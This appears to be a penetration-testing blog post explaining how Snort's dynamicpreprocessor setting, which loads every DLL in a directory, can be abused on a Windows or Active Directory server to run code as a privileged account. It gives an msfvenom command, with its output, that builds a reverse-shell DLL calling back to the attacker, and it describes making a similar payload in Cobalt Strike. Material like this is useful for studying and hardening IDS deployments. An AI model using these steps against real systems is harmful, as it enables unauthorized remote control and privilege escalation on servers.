Abusing Snort Configuration

Penentration Test Leave a comment

Eid Mubarak,

After spending several days reading articles and practicing various techniques, I have come across an interesting topic that I would like to share. I am going to discuss the exploitation of the Snort application in order to gain control of a server.

Snort is a free and open-source Network Intrusion Detection/Prevention System (IDS/IPS). It acts as a security guard for your network by monitoring traffic in real-time and analyzing it for malicious activity. Snort can detect a wide range of threats, including:

  • Probes for vulnerabilities in your systems
  • Attempts to exploit known vulnerabilities
  • Malware (malicious software)
  • Unauthorized access attempts

Snort on Active Directory Server

Installing Snort, an open-source intrusion detection and prevention system (IDPS), on an Active Directory (AD) server can offer several benefits, enhancing the security and monitoring capabilities of your network. Here are the key advantages:

  1. Better Security:
    • Real-time Detection: Snort monitors network traffic and detects threats immediately.
    • Block Attacks: It can prevent attacks from reaching the AD server.
  2. Detailed Logging:
    • Track Activity: Snort logs all network activity, which helps in analyzing incidents.
    • Alerts: It sends alerts for any suspicious activities.

  3. Compliance and Auditing:
    • Meet Standards: Helps comply with security regulations like PCI-DSS, HIPAA, etc.
    • Audit Trails: Provides logs and reports necessary for audits.

  4. Quick Response to Incidents:
    • Immediate Action: Enables rapid response to security incidents.
    • Forensics: Provides data needed to investigate and understand attacks.

Snort Configuration (dynamicpreprocessor)

Configuring Snort to use the dynamicpreprocessor feature involves setting up dynamically loadable preprocessor modules. These modules allow Snort to handle various types of traffic analysis and processing tasks, adding flexibility and extensibility to its detection capabilities

dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/

Exploiting Missed Configuration

With the configuration specified, Snort will load any Dynamic Link Library (DLL) located in the snort_dynamicpreprocessor directory. This become a potential for threat actors to introduce a malicious DLL for execution during Snort’s operation.

Unfortunately, most of the snort application will also run with privileged account such as administrator

Generate the malicious DLL using metasploit or cobaltstrike and upload it to the snort directory. Now, the adversaries has to wait until the snort is executed and loads all the dll under the directory.

Metasploit

msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f dll -a x64 -o rio.dll
                            
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: rio.dll

Cobaltstrike

You can go the Payload and Select the Output Windows DLL. Dont fortget to select the C2 Listener

Metasploit Reverse Shell Created

Leave a Reply